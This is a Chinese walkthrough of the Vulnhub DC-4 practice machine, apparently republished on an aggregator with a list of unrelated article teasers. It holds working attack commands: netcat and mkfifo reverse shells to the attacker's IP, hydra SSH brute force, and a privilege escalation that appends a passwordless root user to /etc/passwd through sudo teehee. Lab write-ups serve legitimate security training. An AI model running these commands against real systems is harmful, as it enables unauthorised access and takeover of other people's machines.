Vulnhub靶场----4、DC-4

news2024/11/30 20:34:26

文章目录

  • 一、环境搭建
  • 二、渗透流程
  • 三、思路总结


一、环境搭建

DC-4下载地址:https://download.vulnhub.com/dc/DC-4.zip
kali:192.168.144.148
DC-4:192.168.144.152


二、渗透流程

端口扫描:nmap -T5 -p- -sV -sT -A 192.168.144.152

在这里插入图片描述

思路:
1、访问80页面,爆破账号密码(可利用)
2、对http://192.168.144.152进行目录爆破
3、查看网页源代码
4、查看web指纹信息
……

使用burpsuite对登录页面进行爆破:admin:happy

在这里插入图片描述
在这里插入图片描述

思路:登录后有run command按钮,抓包发现可以执行命令
1、请求包中执行反弹shell命令(可利用)
2、使用wget,让靶机下载webshell,然后连接webshell
……

在这里插入图片描述

方法1:

使用netcat反弹shell:nc -e /bin/sh 192.168.144.148 4444
kali监听:nc -lvnp 4444

在这里插入图片描述

python -c 'import pty;pty.spawn("/bin/sh")'

在这里插入图片描述
方法2:

kali端监听: nc -lnvp 4444
修改网页源代码为反弹shell代码:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.144.148 4444 > /tmp/f;,然后点击run

在这里插入图片描述


kali端获取到反弹shell

在这里插入图片描述

思路(此时已经拿到shell):
1、查看当前权限
2、翻翻找找,看看有没有可利用的
……

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

cat /etc/passwd 发现三个用户:charles、jim、sam

在这里插入图片描述

cd /home 发现三个用户目录
/jim路径下发现old-passwords.bak文件进行利用

在这里插入图片描述

利用old-passwords.bak保存的密码对jim的密码进行爆破;
爆破密码:hydra -l jim -P passwd.txt -s 22 ssh://192.168.144.152
成功获取密码:jim:jibril04
ssh登录:ssh jim@192.168.144.152 -p 22

在这里插入图片描述

cd /var/mail 下发现charles的密码:^xHhA&hvim0y

在这里插入图片描述

jim下没其他可以利用的了,我们尝试登录charles用户
ssh charles@192.168.144.152 -p 22

在这里插入图片描述

查看是否有sudo权限:sudo -l
发现teehee执行权限

在这里插入图片描述

teehee --help
发现-a参数可以写入文件

在这里插入图片描述

用户名:密码:用户ID:组ID:用户说明:家目录:登陆之后的 shell
echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
su test

在这里插入图片描述


三、思路总结

1、爆破登录账号密码
2、根据页面功能反弹shell
3、查看获取到的shell的可利用文件
4、ssh连接  
5、利用teehee执行权限添加特权用户,获取root权限

参考链接:
https://blog.mzfr.me/vulnhub-writeups/2019-07-11-DC4

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/363465.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

ISIS协议

ISIS协议基础简介应用场景路由计算过程地址结构路由器分类邻居Hello报文邻居关系建立DIS及DIS与DR的类比链路状态信息的载体链路状态信息的交互路由算法网络分层路由域![在这里插入图片描述](https://img-blog.csdnimg.cn/9027c43b614a4399ae1f54e87a37f047.png)区域间路由简介…

【MySQL】表操作和库操作

文章目录概念库操作1.创建数据库2.删除数据库3.选择数据库4.显示数据库列表表操作1.创建数据表CREATE2.删除数据表DROP3.插入数据INSERT4.更新数据UPDATE5.修改数据ALTER6.查询数据SELECT7.WHERE子句8.ORDER BY子句9.LIMIT子句10.GROUP BY子句11.HAVING子句使用注意事项概念 M…

Java集合(一)---List和set

1.Java集合有哪些?集合类型主要有3种:set(集)、list(列表)和map(映射)Map接口和Collection接口是所有集合框架的父接口:1. Collection接口的子接口包括:Set接口和List接口2. Map接口的实现类主要有&#xf…

【Python】批量采集原神表情包~

嗨害大家好鸭~我是小熊猫(✿◡‿◡) 最近迷上了原神, 不自觉中就很喜欢保存广大旅行者制作的表情包~ 真的很有意思诶~ 源码资料电子书:点击此处跳转文末名片获取 一个个保存的话,好像效率很低嘛… 那我就发挥我小熊猫的老本行直接给把他们全部采集下…

零基础机器学习做游戏辅助第十三课--原神自动钓鱼(三)labelimg的使用

一、什么是labelimg labelimg是一款开源的图像标注工具,标签可用于分类和目标检测,它是用python写的,并使用Qt作为其图形界面,简单好用(虽然是英文版的)。其注释以 PASCAL VOC格式保存为XML文件,这是ImageNet使用的格式。此外,它还支持 COCO数据集格式。 二、安装label…

大数据时代下的企业网络安全

在大数据技术迅猛发展的今天,网络安全问题已经发展成一个广受关注的热门研究方向。有人说,“大数据下,人人裸奔”,隐私保护、数据防护日益成为广大学者、企业研究的焦点。 面对这种安全威胁,企业必须实施一些有效的信…

Allegro无法看到金属化孔的钻孔的原因和解决办法

Allegro无法看到金属化孔的钻孔的原因和解决办法 用Allegro设计PCB的时候,希望同时看到金属化孔的盘以及钻孔,如下图 但是有时显示效果是这样的,看不到钻孔了 导致无法直观地区分是通孔是还是表贴的盘 如何解决,具体操作如下 点击Setup

27正定矩阵

这一节进入正定矩阵的内容,什么叫做正定矩阵?为什么我们对矩阵正定这么感兴趣? PS:这一节将前面所有的概念都融合在一起:主元、行列式、特征值、不稳定性 一、正定矩阵的判断方法 为了说明问题,我们先考…

低代码平台和无代码平台哪个更适合开发企业管理系统?

编者按:本文分析了开发企业管理系统所需要的平台特性,并根据这些特点和低代码无代码的优劣比较,得出低代码平台更适合开发企业管理系统。关键词:私有化部署,可视化设计,源码交付,数据集成&#…

研究人员在野外发现大量的信息窃取者 “Stealc “的样本

一个名为Stealc的新信息窃取者正在暗网上做广告,它可能成为其他同类恶意软件的一个值得竞争的对象。 "SEKOIA在周一的一份报告中说:"威胁行为者将Stealc作为一个功能齐全、随时可用的窃取者,其开发依赖于Vidar、Raccoon、Mars和Re…

LeetCode 73. 矩阵置零

LeetCode 73. 矩阵置零 难度:middle\color{orange}{middle}middle 题目描述 给定一个 KaTeX parse error: Double subscript at position 3: _m_̲ x _n_ 的矩阵,如果一个元素为 0 ,则将其所在行和列的所有元素都设为 0 。请使用 原地 算法…

Power Query 再谈日期表

Power Query 再谈日期表 需要附件的朋友可以点赞关注后,在公众号(焦棚子)后台回复 日期表 三个字即可领取。 一、背景 在 Power BI 或者 Power Pivot 做业务分析中,必不可少的就是日期表。我们继续优化调制出符合国人习惯日期表。 本次更新&#xff…

harbor 仓库迁移升级

harbor 仓库迁移升级 harbor仓库安装数据传输仓库切换版本 v1.8.0 v2.3.5 harbor仓库安装 环境准备:安装docker详见:docker 的介绍和部署,并下载docker-compose详见:docker 三剑客compose。 现有支持的安装harbor仓库的方式有两…

犹太教、基督教、伊斯兰教的区别与联系

一、犹太教、基督教、伊斯兰教的简明关系图二、犹太教、基督教、伊斯兰教的主要区别注:弥赛亚(希伯莱语)就是基督(希腊语),意思是“救世主”。注:伊斯兰教的观点是:穆罕默德不是伊斯…

华为OD机试 - 优雅数组(Python)【2023-Q1 新题】

华为OD机试300题大纲 参加华为od机试,一定要注意不要完全背诵代码,需要理解之后模仿写出,通过率才会高。 华为 OD 清单查看地址:blog.csdn.net/hihell/category_12199275.html 华为OD详细说明:https://dream.blog.csdn.net/article/details/128980730 优雅数组 | 华为…

S5P6818_系统篇(2)源码编译及烧录

源码获取 源码获取和操作流程 1.下载liunux下的系统制作脚本,可以烧录系统和构建镜像 git clone https://github.com/friendlyarm/sd-fuse_s5p6818.git 如果出现git错误可使用如下方法: git config --global http.sslverify false 2.阅读该工具rea…

Linux文件系统操作与磁盘管理

查看磁盘和目录的容量 使用 df 命令查看磁盘的容量 df在实验楼的环境中你将看到如下的输出内容: 但在实际的物理主机上会更像这样: 物理主机上的 /dev/sda2 是对应着主机硬盘的分区,后面的数字表示分区号,数字前面的字母 a 表示…

Magisk Yyds.Msu定制方案 原理 ROOT隐藏 风控绕过

介绍 与市面上所有方案都不一样,基于最新Magisk代码分支,通过修改Magisk的挂载方式,解决了root隐藏的问题,可绕过如momo独立进程,挂载检测等各种风控,并因为个人项目原因,默认把Zygisk禁用&…

【手把手一起学习】(二) Altium Designer 20 工程创建

1 Altium Designer 20 工程创建 手把手一起学习,从零开始制作一款属于自己的STM32核心板,规范AD使用,养成良好习惯 1.1 新建工程 首先,创建工程,操作如图所示: 选择默认工程,输入工程名字和路…

吊炸天的1500亿,到底有多魔性

超1500亿的数据安全规模 数据安全是近几年来最热门的行业话题,数字化转型使得数据作为新型生产要素的重要性日益凸显,数据经济已成为经济发展的核心驱动力,数字经济的蓬勃催生了巨大的数据安全需求。 临近春节前夕,在工信部、国…